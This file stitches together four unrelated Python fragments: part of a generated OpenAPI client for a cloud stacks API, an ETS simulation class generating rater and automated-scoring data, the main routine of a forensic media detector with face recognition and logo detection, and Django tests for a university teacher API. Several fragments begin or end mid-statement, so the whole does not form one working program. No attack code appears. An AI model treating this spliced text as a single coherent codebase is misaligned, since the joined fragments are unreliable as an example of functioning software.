body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def validate_stack(self, **kwargs):
"""
validate stack
Stacks are template instances - a running cloud infrastructure created based on a template. Stacks are always launched on behalf of a cloud user account. Stacks support a wide range of resources, allowing you to build a highly available, reliable, and scalable infrastructure for your application needs.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.validate_stack(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param StackValidationRequest body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.validate_stack_with_http_info(**kwargs)
else:
(data) = self.validate_stack_with_http_info(**kwargs)
return data
def validate_stack_with_http_info(self, **kwargs):
"""
validate stack
Stacks are template instances - a running cloud infrastructure created based on a template. Stacks are always launched on behalf of a cloud user account. Stacks support a wide range of resources, allowing you to build a highly available, reliable, and scalable infrastructure for your application needs.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.validate_stack_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param StackValidationRequest body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method validate_stack" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v1/stacks/validate', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def variants_stack(self, **kwargs):
"""
retrieve available platform variants
Stacks are template instances - a running cloud infrastructure created based on a template. Stacks are always launched on behalf of a cloud user account. Stacks support a wide range of resources, allowing you to build a highly available, reliable, and scalable infrastructure for your application needs.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
| |
"""
Module containing the Dataset class needed for PRMSE simulations.
:author: <NAME>
:author: <NAME>
:organization: ETS
:date: March 2020
"""
import sys
from pathlib import Path
import joblib
import numpy as np
import pandas as pd
class Dataset:
"""
Class encapsulating a single simulated dataset.
A class encapsulating a given simulated dataset as defined
by the number of responses, the number and type of human raters,
and the number and type of automated scoring systems, and other
attributes.
"""
def __init__(self,
num_responses=10000,
rater_categories=['low', 'moderate', 'average', 'high'],
system_categories=['poor', 'low', 'medium', 'high', 'perfect'],
num_raters_per_category=50,
num_systems_per_category=5,
rater_rho_per_category=[0.4, 0.55, 0.65, 0.8],
system_r2_per_category=[0, 0.4, 0.65, 0.8, 0.99],
min_score=1,
max_score=6,
true_score_mean=3.844,
true_score_sd=0.74):
"""
Create ``Simulation`` instance based on given settings.
Parameters
----------
num_responses : int
The total number of responses in this simulated dataset.
Defaults to 10000.
rater_categories : list of str
A list of string labels defining the possible rater
categories; a rater category is defined by the
inter-rater agreement in that category.
Defaults to ``['low', 'moderate', 'average', 'high']``.
system_categories : list of str
A list of string labels defining the possible automated scoring
system categories; a system category is defined by the agreement
of that system's predictions with the true scores.
Defaults to ``['poor', 'low', 'medium', 'high', 'perfect']``.
num_raters_per_category : int
An integer indicating the number of raters we want
to simulate in each rater category.
Defaults to 50.
num_systems_per_category : int
An integer indicating the number of scoring systems
we want to simulate in each system category.
Defaults to 5.
rater_rho_per_category : list of float
A list of pearson (rho) values that define each rater category.
The first rater category in ``rater_categories`` corresponds
to the first rho value in this list.
Defaults to ``[0.4, 0.55, 0.65, 0.8]``.
system_r2_per_category : list of float
A list of R^2 values that define each system category.
The first system category in ``system_categories`` corresponds
to the first R^2 value in this list.
Defaults to ``[0, 0.4, 0.65, 0.8, 0.99]``.
min_score : int
The lowest human score in this simulated dataset.
Defaults to 1.
max_score : int
The highest human score in this simulated dataset.
Defaults to 6.
true_score_mean : float
The desired mean we want for the simulated gold standard/true
scores.
Defaults to 3.844 based on a real dataset.
true_score_sd : float
The desired standard deviation we want for the simulated
gold standard/true scores.
Defaults to 0.74 based on a real dataset.
"""
self.num_responses = num_responses
self.rater_categories = rater_categories
self.rater_rho_per_category = rater_rho_per_category
self.num_raters_per_category = num_raters_per_category
self.system_categories = system_categories
self.system_r2_per_category = system_r2_per_category
self.num_systems_per_category = num_systems_per_category
self.min_score = min_score
self.max_score = max_score
self.true_score_mean = true_score_mean
self.true_score_sd = true_score_sd
# these attributes are initialized as empty for now
self._true_scores = None
self._rater_scores = []
self._rater_metadata = []
self._system_scores = []
self._system_metadata = []
@classmethod
def from_dict(cls, argdict):
"""Create a ``Dataset`` instance from the given dictionary."""
return cls(**argdict)
@classmethod
def from_file(cls, dataset_path):
"""Load ``Dataset`` instance from disk."""
dataset = joblib.load(dataset_path)
return dataset
def save(self, dataset_path):
"""Save ``Dataset`` instance to disk."""
# create the directory if it doesn't exist
dataset_dir = Path(dataset_path).parent
if not dataset_dir.exists():
dataset_dir.mkdir(parents=True)
# write out the dataset to disk
joblib.dump(self, dataset_path)
def save_frames(self, output_dir):
"""Save the frames obtained via ``to_frames()`` to disk."""
# create the directory if it doesn't exist
output_dir = Path(output_dir)
if not output_dir.exists():
output_dir.mkdir(parents=True)
# get the 3 data frames representing the dataset
(df_scores,
df_rater_metadata,
df_system_metadata) = self.to_frames()
# write out each of the frames to disk
df_scores.to_csv(output_dir / 'scores.csv', index=False)
df_rater_metadata.to_csv(output_dir / 'rater_metadata.csv', index=False)
df_system_metadata.to_csv(output_dir / 'system_metadata.csv', index=False)
def __str__(self):
"""Return a string representation of Dataset."""
ans = "Dataset ("
ans += f"{self.num_responses} responses, "
ans += f"scores in [{self.min_score}, {self.max_score}], "
ans += f"{len(self.rater_categories)} rater categories, "
ans += f"{self.num_raters_per_category} raters/category, "
ans += f"{len(self.system_categories)} system categories, "
ans += f"{self.num_systems_per_category} systems/category)"
return ans
def __repr__(self):
"""Return the official string representation of Dataset."""
return str(self)
def truncate(self, scores):
"""
Truncate given scores to range [``min_score``, ``max_score``].
Parameters
----------
scores : numpy.ndarray
Input array of scores to be truncated.
Returns
-------
truncated_scores : numpy.ndarray
Output array with each element of ``scores`` truncated to
the range [``min_score``, ``max_score``].
"""
truncated_scores = np.where(scores > self.max_score,
self.max_score,
np.where(scores < self.min_score,
self.min_score,
scores)
)
return truncated_scores
def _add_noise_to_true_scores(self,
error_sd,
seed,
round=True,
truncate=True):
"""
Add noise/error to the simulated true scores.
The noise/error terms are computed by sampling from a normal distribution
with a mean of 0 and the given error std. dev.
This method is useful for generating scores assigned by a hypothetical
human or automated rater that are usually defined in test theory as
true scores + measurement error.
Parameters
----------
error_sd : float
The std. dev. of the error term.
seed : int
The seed used to instantiate the ``numpy.random.RandomState``
instance from which the error terms are sampled.
round : bool, optional
Whether to round the computed rater scores.
Defaults to ``True``.
truncate : bool, optional
Whether to truncate the computed rater scores to the score
range defined for this dataset.
Note that truncation happens after rounding unless ``round``
is ``False``.
Defaults to ``True``.
Returns
-------
rater_scores : numpy.ndarray
Array of scores with noise added to original scores.
"""
# instantiate a PRNG with the given seed
prng = np.random.RandomState(seed)
# sample the error terms from the appropriate distribution
sampled_errors = prng.normal(0, error_sd, self.num_responses)
# add the error terms to the true scores and round
computed_scores = self._true_scores + sampled_errors
# if requested, round the scores to integers first
rounded_scores = np.round(computed_scores) if round else computed_scores
# if requested, truncate scores to the range defined for this dataset
truncated_scores = self.truncate(rounded_scores) if truncate else rounded_scores
return truncated_scores
def _generate_true_scores(self, seed):
"""
Generate true scores for simulated dataset.
This method simulates true scores based on the pre-defined
mean and standard deviation. The scores are sampled from the
normal distribution defined by ``train_score_mean`` and
``train_score_sd`` and are truncated to be in the range
[``min_score``, ``max_score``].
The generated scores are saved in the private ``_true_scores``
attribute.
Parameters
----------
seed : int
The seed used to instantiate the ``numpy.random.RandomState``
instance that generates the simulated true scores.
"""
# instantiate a PRNG with the given seed
prng = np.random.RandomState(seed)
# generate true/gold standard score from the normal distribution
# defined by the mean and standard deviation in settings
sampled_scores = prng.normal(self.true_score_mean,
self.true_score_sd,
self.num_responses)
# truncate the scores to the desired range
true_scores = self.truncate(sampled_scores)
self._true_scores = true_scores
def _find_best_error_sd_for_rho(self, rho, error_seed):
"""
Do a linear search for the best error std. dev. value.
Search for the error std. dev. value that gets us closest
to the given rho as follows:
(a) define a range of error std. dev. values
(b) generate error terms with each error std. dev. and compute
hypothetical rater scores by adding noise to the true scores
(c) compute the average inter-rater correlation for these scores
(d) return the error std. dev. value for which this average
inter-rater correlation is closest to our desired rho.
Parameters
----------
rho : float
The desired inter-rater correlation.
error_seed : int
The seed used to instantiate the ``numpy.random.RandomState``
instance which is then used to define the normal distribution
from which error terms are sampled.
Returns
-------
error_sds : numpy.ndarray
The array of error std. dev. values that is searched.
mean_correlations : numpy.ndarray
The array of mean inter-rater correlations corresponding
to each error std. dev. value
chosen_error_sd : float
The chosen error std. dev. value that yields the mean
inter-rater correlation closest to our desired rho.
"""
# set up an array of error std. dev. we will search over
error_sds = np.arange(0.01, 1.5, step=0.01)
# instantiate an empty list that will hold all the average inter-rater
# correlation for each error std. dev. value
mean_inter_rater_correlations = []
# sweep over the error std. dev. values
for error_sd in error_sds:
# instantiate a list that will hold the scores for all human raters
scores_for_all_raters = []
| |
after completion
pool.join()
pool.terminate()
result = [x for x in result if x != None]
for processedAudio in result:
speechPercentage, audiopath = processedAudio
# Check for the video flag
if not isinstance(speechPercentage, float):
logfile.write("Unsupported audio file: " + str(audiopath) + "\n")
else:
speechPercentage, audiopath = processedAudio
# Hashing the video once
hash_md5 = hashlib.md5()
with open(audiopath, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
hashvalue = hash_md5.hexdigest()
audiocounter += 1
if REPORT_FORMAT[0] == 'Nuix':
if speechPercentage != 0.0:
line = ",".join(["AUDIO-SPEECH", "md5:" + hashvalue])
else:
line = ",".join([Path(audiopath).name, hashvalue, str(speechPercentage), "AUDIO-SPEECH"])
detectionresults.write(line + "\n")
logfile.write("*" + str(datetime.now()) + ": \tAudio speech detection completed.*\n")
detectionresults.flush()
detectionresults.close()
return audiocounter
######
# Split the report file to allow seamless integration into XWays Hash Database per category
######
def createXWaysReport():
detectionresults_path = str(PATH_TO_RESULTS / 'Detection_Results.csv')
xways_folder = PATH_TO_RESULTS / 'XWaysOutput'
if not xways_folder.exists(): os.mkdir(str(xways_folder))
for key, rows in groupby(csv.reader(open(detectionresults_path)),
lambda row: row[3]):
# Replace special characters in categories
if str(key) != 'category':
key = str(key).replace("/","-")
key = str(key).replace(".", "")
key = str(key).replace("(", "")
key = str(key).replace(")", "")
key = key + '.txt'
detectionresults_single_path = xways_folder / key
with open(str(detectionresults_single_path), 'a') as rf:
for row in rows:
rf.write(row[1] + "\n")
rf.flush()
# Get a list of all files in results directory
resultsfiles = os.listdir(str(xways_folder))
# Prepend them with MD5 for seamless import into XWays
for file in resultsfiles:
line = "md5"
if file[-3:] == 'txt' and file != 'Logfile.txt':
with open(str(xways_folder / file), 'r+') as ff:
content = ff.read()
ff.seek(0,0)
ff.write(line.rstrip('\r\n') + '\n' + content)
######
#
# Main program function
# First initiates required parameters and variables, then loads the GUI
# After which the image and video load functions are triggered based on the input parameters
# Finally, the detection is executed and results written to the place requested
#
######
# Prevent execution when externally called
if __name__ == '__main__':
######
# Collecting parameters via GUI
######
sg.ChangeLookAndFeel('Dark')
layout = [[sg.Text('General Settings', font=("Helvetica", 13), text_color='sea green')],
[sg.Text('Please specify the folder holding the media data:')],
[sg.Input(), sg.FolderBrowse('Browse', initial_folder='/home/b/Desktop/TestBilder', button_color=('black', 'grey'))], #Path.home() = Initial folder
[sg.Text('Where shall I place the results?')],
[sg.Input(), sg.FolderBrowse('Browse', initial_folder='/home/b/Desktop/TestResults', button_color=('black', 'grey'))], #Path.home()
[sg.Text('TENSORFLOW DETECTORS')],
[sg.Checkbox('Objects/Persons', size=(15, 2)),
sg.Checkbox('Actions'),
sg.Checkbox('IS Logos'),
sg.Checkbox("Face Recognition")],
[sg.Text('OPEN VINO DETECTORS')],
[sg.Checkbox('Objects-fast', size=(15, 2)),
sg.Checkbox('Faces/Age/Gender')],
[sg.Text('Output Format:'), sg.Listbox(values=('Nuix', 'XWays', 'csv'), size=(29, 3))],
[sg.Text('Video Settings', font=("Helvetica", 13), text_color='sea green')],
[sg.Text('# of frames to be analyzed per Minute:', size=(36, 0))],
[sg.Slider(range=(1, 120), orientation='h', size=(29, 20), default_value=30)],
[sg.Text('Max. # of frames to be analyzed per Video:', size=(36, 0))],
[sg.Slider(range=(1, 500), orientation='h', size=(29, 20), default_value=100)],
[sg.Text('Check for & discard similar frames?'),
sg.InputCombo(('Yes', 'No'), default_value='No', size=(10, 2))],
[sg.Text('Face Recognition', font=("Helvetica", 13), text_color='sea green')],
[sg.Text('Specify folder with known faces (if FaceReq selected): ')],
[sg.Input(), sg.FolderBrowse('Browse', initial_folder='/home/b/Desktop/known', button_color=('black', 'grey'))],
[sg.Text('Specify face recognition tolerance (Default: 60%):', size=(48, 0))],
[sg.Slider(range=(0, 100), orientation='h', size=(29, 20), default_value=60)],
[sg.Checkbox('Output detected faces as jpg', size=(25, 2))],
[sg.Text('Audio Settings', font=("Helvetica", 13), text_color='sea green')],
[sg.Text('AUDIO PROCESSING')],
[sg.Checkbox('Speech Detection', size=(15, 2))],
[sg.OK(button_color=('black', 'sea green')), sg.Cancel(button_color=('black', 'grey'))]]
layout_progress = [[sg.Text('Detection in progress')],
[sg.ProgressBar(12, orientation='h', size=(20, 20), key='progressbar')],
[sg.Cancel()]]
# Render the GUI
gui_input = sg.Window('BKP Media Detector').Layout(layout).Read()
error = False
# Validate input
validateInput(gui_input)
# Initiating progress meter
updateProgressMeter(1, 'Initializing variables & parameters...')
startTime = datetime.now()
# Variable to determine minimum GPU Processor requirement & to disable TF log output
# os.environ['TF_MIN_GPU_MULTIPROCESSOR_COUNT'] = '5'
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
# Validating TF version
if StrictVersion(tf.__version__) < StrictVersion('1.9.0'):
raise ImportError('Please upgrade your TensorFlow installation to v1.9.* or later!')
# Defining multiple needed variables based on GUI input & adding TF/OpenVINO directory to path
PATH_TO_INPUT = Path(gui_input[1][0])
TEST_IMAGE_PATHS = Path.iterdir(PATH_TO_INPUT)
number_of_input = 0
for elements in Path.iterdir(PATH_TO_INPUT):
number_of_input += 1
PATH_TO_RESULTS = Path(gui_input[1][1])
PATH_TO_OBJECT_DETECTION_DIR = '/home/b/Programs/tensorflow/models/research' # PLACEHOLDER-tobereplacedWithPathtoDirectory
sys.path.append(PATH_TO_OBJECT_DETECTION_DIR)
REPORT_FORMAT = gui_input[1][8]
frames_per_second = gui_input[1][9] / 60
max_frames_per_video = gui_input[1][10]
video_sensitivity_text = gui_input[1][11]
KNOWN_FACES_PATH = gui_input[1][12]
facereq_tolerance = int(gui_input[1][13])/100
output_detFaces = gui_input[1][14]
if video_sensitivity_text == "Yes":
video_sensitivity = 20
else:
video_sensitivity = 0
# Check which models to apply and load their corresponding label maps
from object_detection.utils import label_map_util
graphlist = []
indexlist = []
MODEL1 = bool(gui_input[1][2])
if MODEL1:
OPEN_IMAGES_GRAPH = str(Path('Models/OpenImages/openimages.pb'))
OPEN_IMAGES_LABELS = str(OPEN_IMAGES_GRAPH)[:-3] + '.pbtxt'
OPEN_IMAGES_INDEX = label_map_util.create_category_index_from_labelmap(OPEN_IMAGES_LABELS)
graphlist.append(OPEN_IMAGES_GRAPH)
indexlist.append(OPEN_IMAGES_INDEX)
MODEL2 = bool(gui_input[1][3])
if MODEL2:
AVA_GRAPH = str(Path('Models/AVA/ava.pb'))
AVA_LABELS = str(AVA_GRAPH)[:-3] + '.pbtxt'
AVA_INDEX = label_map_util.create_category_index_from_labelmap(AVA_LABELS)
graphlist.append(AVA_GRAPH)
indexlist.append(AVA_INDEX)
MODEL3 = bool(gui_input[1][4])
if MODEL3:
SPECIAL_DETECTOR_GRAPH = str(Path('Models/ISLogos/islogos.pb'))
SPECIAL_DETECTOR_LABELS = str(SPECIAL_DETECTOR_GRAPH)[:-3] + '.pbtxt'
SPECIAL_DETECTOR_INDEX = label_map_util.create_category_index_from_labelmap(SPECIAL_DETECTOR_LABELS)
graphlist.append(SPECIAL_DETECTOR_GRAPH)
indexlist.append(SPECIAL_DETECTOR_INDEX)
FACE_RECOGNITION = bool(gui_input[1][5])
OPEN_VINO_vgg19 = bool(gui_input[1][6])
FACE_MODEL = bool(gui_input[1][7])
AUDIO_SPEECH_DETECTION = bool(gui_input[1][15])
# Update the progress indicator
updateProgressMeter(2, 'Process started. Loading ' + str(number_of_input) + ' media files...')
# Create logfile
logfile = open(str(PATH_TO_RESULTS / 'Logfile.txt'), 'w')
logfile.write('***DETECTION LOG***\n')
logfile.write("*" + str(datetime.now()) + ': \tProcess started. Loading images...*\n')
# Create resultsfile
detectionresults_path = PATH_TO_RESULTS / 'Detection_Results.csv'
detectionresults = open(str(detectionresults_path), 'w')
if REPORT_FORMAT[0] == 'Nuix':
detectionresults.write("tag,searchterm\n")
else:
detectionresults.write("name,hash,score,category\n")
detectionresults.flush()
detectionresults.close()
# Initiate needed variables
vidlist = []
audiolist = []
final_images = []
errors = []
# Multiprocess the image load function on all CPU cores available
pool = Pool(maxtasksperchild=100)
processed_images = pool.map(load_image_into_numpy_array, TEST_IMAGE_PATHS, chunksize=10)
pool.close()
# Synchronize after completion
pool.join()
pool.terminate()
# Clean the result for None types (where image conversion failed)
processed_images = [x for x in processed_images if x != None]
# Check for the different flags set by mimetype
for processed_image in processed_images:
if str(processed_image[1]) == "VIDEO":
# If present, populate the video list
vidlist.append(processed_image[0])
elif str(processed_image[1]) == "AUDIO":
audiolist.append(processed_image[0])
elif str(processed_image[1]) == "OCTET":
if processed_image[0][-3:] in ["mp4", "mov", "mpg", "avi", "exo", "mkv", "m4v", "ebm"]:
vidlist.append(processed_image[0])
else:
audiolist.append(processed_image[0])
elif str(processed_image[1]) == "ERROR":
errors.append(processed_image[0])
else:
# If not, put it to the final images list
final_images.append(processed_image)
for error in errors:
logfile.write(error)
logfile.flush()
# Count the number of images before adding the videoframes
number_of_images = len(final_images)
# Update the progress indicator
updateProgressMeter(3, 'Loading ' + str(len(vidlist)) + ' Videos...')
# Multiprocess the video load function on all CPU cores available
pool = Pool(maxtasksperchild=10)
videoframes = pool.map(load_video_into_numpy_array, vidlist, chunksize=2)
pool.close()
# Synchronize after completion
pool.join()
pool.terminate()
number_of_videos = 0
# Clean the result for None types (where video conversion failed)
for video in videoframes:
if type(video) is str:
errors.append(video)
if type(video) is list:
final_images.extend(video)
number_of_videos += 1
for error in errors:
logfile.write(error)
logfile.flush()
# Split the result from the loading function into hashes and image arrays
if len(final_images) != 0:
image_path, hashvalues, image_nps = zip(*final_images)
# Update the progress indicator & logfile
updateProgressMeter(4, 'Starting detection of ' + str(len(final_images)) + ' media files')
logfile.write("*" + str(datetime.now()) + ": \tLoading completed. Detecting...*\n")
# Conduct Face Recognition if needed
if FACE_RECOGNITION:
known_face_counter = faceRecognition(KNOWN_FACES_PATH, image_path, image_nps, hashvalues)
# Conduct OpenVino VGG19 Model if needed
if OPEN_VINO_vgg19:
run_inference_openvino(image_path, image_nps, hashvalues)
# Execute all other detection models
if len(final_images) != 0:
run_inference_for_multiple_images(image_path, image_nps, hashvalues)
# Conduct face/age/gender detection
if FACE_MODEL:
faceDetection(image_path, image_nps, hashvalues)
if AUDIO_SPEECH_DETECTION:
audiofiles_processed = audioSpeechDetection(audiolist)
else:
audiofiles_processed = 0
# Check whether an Xways report needs to be created
if REPORT_FORMAT[0] == 'XWays':
createXWaysReport()
# Write process statistics to logfile
logfile.write("*Results:\t\t\t" + str(PATH_TO_RESULTS / 'Detection_Results.csv*\n'))
logfile.write("*Total Amount of Files:\t\t" + str(number_of_input) + " (of which " + str(number_of_images + number_of_videos + audiofiles_processed) + " were processed.)*\n")
logfile.write("*Processed Images:\t\t" + str(number_of_images) + "*\n")
logfile.write("*Processed Videos: \t\t" + str(number_of_videos) + " (analyzed " + str(frames_per_second * 60) + " frames per minute, up to max. 500) with the check for content-based duplicates set to " + video_sensitivity_text + "\n")
logfile.write("*Processed Audio Files:\t\t" + str(audiofiles_processed) + "*\n")
logfile.write("*Applied models:\n")
for y in range(0, len(graphlist)): logfile.write("\t\t\t\t" + graphlist[y] + "\n")
if OPEN_VINO_vgg19: logfile.write("\t\t\t\tOpenVINO Object Detector\n")
if FACE_MODEL: logfile.write("\t\t\t\tFace-Age-Gender Detector\n")
if FACE_RECOGNITION: logfile.write("\t\t\t\tFace Recognition (Known faces detected: " + str(known_face_counter) + ")\n")
logfile.write("*Processing time:\t\t" + str(datetime.now() - startTime) + "*\n")
logfile.write("*Time per processed file:\t" + str((datetime.now() - startTime) / (number_of_images + number_of_videos + audiofiles_processed)) + "*\n")
logfile.flush()
logfile.close()
# Update progress indicator
sg.OneLineProgressMeter('BKP Media Detector', 12, 12, 'key', 'Detection finished',orientation='h',size=(100, 10))
# Deliver final success pop up to user
sg.Popup('The detection was successful',
'The results | |
'PA', 'lang': 'it'}
res = req.get(url, data=data)
assert res.json()['results'][0]['TeacherCVFull'] is None
data = {'department': 1}
res = req.get(url, data=data)
assert len(res.json()['results']) == 1
data = {'department': 1, 'role': 'PO'}
res = req.get(url, data=data)
assert len(res.json()['results']) == 0
data = {'department': 1, 'role': 'PA', 'lang': 'en'}
res = req.get(url, data=data)
assert len(res.json()['results']) == 1
data = {'regdid': 1}
res = req.get(url, data=data)
assert decrypt(res.json()['results'][0]['TeacherID']) == '111112'
data = {'regdid': 2}
res = req.get(url, data=data)
assert decrypt(res.json()['results'][0]['TeacherID']) == '111111'
data = {'regdid': 1, 'role': 'PA'}
res = req.get(url, data=data)
assert decrypt(res.json()['results'][0]['TeacherID']) == '111112'
data = {'cds': 1}
res = req.get(url, data=data)
assert len(res.json()['results']) == 0
class ApiTeacherStudyActivitiesUnitTest(TestCase):
def test_apiteacherstudyactivitiesunittest(self):
req = Client()
u1 = UnitaOrganizzativaUnitTest.create_unitaOrganizzativa(**{
'uo': '2',
'uo_padre': '1',
})
doc1 = PersonaleUnitTest.create_personale(**{
'id': 1,
'nome': 'Simone',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'id_ab': 1,
'matricola': '111112',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': u1,
})
regdid = DidatticaRegolamentoUnitTest.create_didatticaRegolamento()
course1 = DidatticaAttivitaFormativaUnitTest.create_didatticaAttivitaFormativa(**{
'af_id': 1,
'des': 'matematica',
'af_gen_des_eng': 'math',
'ciclo_des': 'Primo semestre',
'regdid': regdid,
'af_radice_id': 1,
'anno_corso': 1,
})
course2 = DidatticaAttivitaFormativaUnitTest.create_didatticaAttivitaFormativa(**{
'af_id': 2,
'des': 'informatica',
'af_gen_des_eng': 'computer science',
'ciclo_des': 'Secondo semestre',
'regdid': regdid,
'af_radice_id': 2,
'anno_corso': 2,
})
DidatticaCoperturaUnitTest.create_didatticaCopertura(**{
'af': course1,
'personale': doc1,
'aa_off_id': 2019,
'fat_part_stu_des': '111',
'fat_part_stu_cod': 'AA',
'part_stu_des': '11',
'part_stu_cod': 'A',
'tipo_fat_stu_cod': 'ALF',
'part_ini': 'A',
'part_fine': 'Z'
})
DidatticaCoperturaUnitTest.create_didatticaCopertura(**{
'af': course2,
'personale': doc1,
'aa_off_id': 2020,
})
url = reverse(
'ricerca:teacherstudyactivities', kwargs={
'teacherid': encrypt('111112')})
# check url
res = req.get(url)
assert res.status_code == 200
# GET
res = req.get(url)
assert res.json()['results'][0]['StudyActivityID'] == 2
res = req.get(url)
assert len(res.json()['results']) == 2
data = {'yearFrom': 2020}
res = req.get(url, data=data)
assert len(res.json()['results']) == 1
data = {'year': 2020}
res = req.get(url, data=data)
assert len(res.json()['results']) == 1
data = {'yearTo': 2020}
res = req.get(url, data=data)
assert len(res.json()['results']) == 2
data = {'yearFrom': 2019, 'yearTo': 2020}
res = req.get(url, data=data)
assert len(res.json()['results']) == 2
class ApiTeacherInfoUnitTest(TestCase):
def test_apiteacherinfounittest(self):
req = Client()
u1 = UnitaOrganizzativaUnitTest.create_unitaOrganizzativa(**{
'uo': '1',
'uo_padre': '1',
})
u2 = UnitaOrganizzativaUnitTest.create_unitaOrganizzativa(**{
'uo': '2',
'uo_padre': '1',
})
p1 = PersonaleUnitTest.create_personale(**{
'id': 1,
'nome': 'Simone',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'aa',
'id_ab': 1,
'matricola': '111112',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': u1,
'cod_fis': 'SMNMNG',
'cv_full_it': 'AAA',
'cv_short_it': 'A',
'cv_full_eng': 'BBB',
'cv_short_eng': 'B',
})
PersonaleUnitTest.create_personale(**{
'id': 2,
'nome': 'Lionel',
'cognome': 'Messi',
'cd_ruolo': 'PO',
'ds_ruolo_locale': 'ab',
'id_ab': 2,
'matricola': '111113',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': u2,
})
DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
'dip_id': 1,
'dip_cod': 1,
'dip_des_it': "Matematica e Informatica",
'dip_des_eng': "Math and Computer Science",
})
regdid = DidatticaRegolamentoUnitTest.create_didatticaRegolamento()
course1 = DidatticaAttivitaFormativaUnitTest.create_didatticaAttivitaFormativa(**{
'af_id': 1,
'des': 'matematica',
'af_gen_des_eng': 'math',
'ciclo_des': 'Primo semestre',
'regdid': regdid,
'af_radice_id': 1,
'anno_corso': 1,
})
DidatticaCoperturaUnitTest.create_didatticaCopertura(**{
'af': course1,
'personale': p1,
'aa_off_id': 2019,
'fat_part_stu_des': '111',
'fat_part_stu_cod': 'AA',
'part_stu_des': '11',
'part_stu_cod': 'A',
'tipo_fat_stu_cod': 'ALF',
'part_ini': 'A',
'part_fine': 'Z'
})
tipo_contatto = PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(
**{'cod_contatto': 'EMAIL', 'descr_contatto': 'Posta Elettronica', })
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'Riferimento Ufficio',
'descr_contatto': 'Riferimento Ufficio',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'POSTA ELETTRONICA CERTIFICATA',
'descr_contatto': 'POSTA ELETTRONICA CERTIFICATA',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'Posta Elettronica Privata',
'descr_contatto': 'Posta Elettronica Privata',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'Fax',
'descr_contatto': 'Fax',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'Telefono Residenza',
'descr_contatto': 'Telefono Residenza',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'Telefono Domicilio',
'descr_contatto': 'Telefono Domicilio',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'Telefono Cellulare',
'descr_contatto': 'Telefono Cellulare',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'Telefono Cellulare Ufficio',
'descr_contatto': 'Telefono Cellulare Ufficio',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'Telefono Ufficio',
'descr_contatto': 'Telefono Ufficio',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'URL Sito WEB Curriculum Vitae',
'descr_contatto': 'URL Sito WEB Curriculum Vitae',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'URL Sito WEB',
'descr_contatto': 'URL Sito WEB',
})
PersonaleUoTipoContattoUnitTest.create_personaleUoTipoContatto(**{
'cod_contatto': 'Skype',
'descr_contatto': 'Skype',
})
PersonaleContattiUnitTest.create_personaleContatti(**{
'cd_tipo_cont': tipo_contatto,
'id_ab': 1,
'contatto': 'email@email',
'prg_priorita': 1,
'cod_fis': p1,
})
PersonaleContattiUnitTest.create_personaleContatti(**{
'cd_tipo_cont': tipo_contatto,
'id_ab': 2,
'contatto': 'email2@email',
'prg_priorita': 1,
})
UnitaOrganizzativaFunzioniUnitTest.create_unitaOrganizzativaFunzioni(**{
'cod_fis': p1,
'termine': '2222-03-26',
'decorrenza': '1900-01-01',
'ds_funzione': 'Direttore',
'matricola': '111112',
})
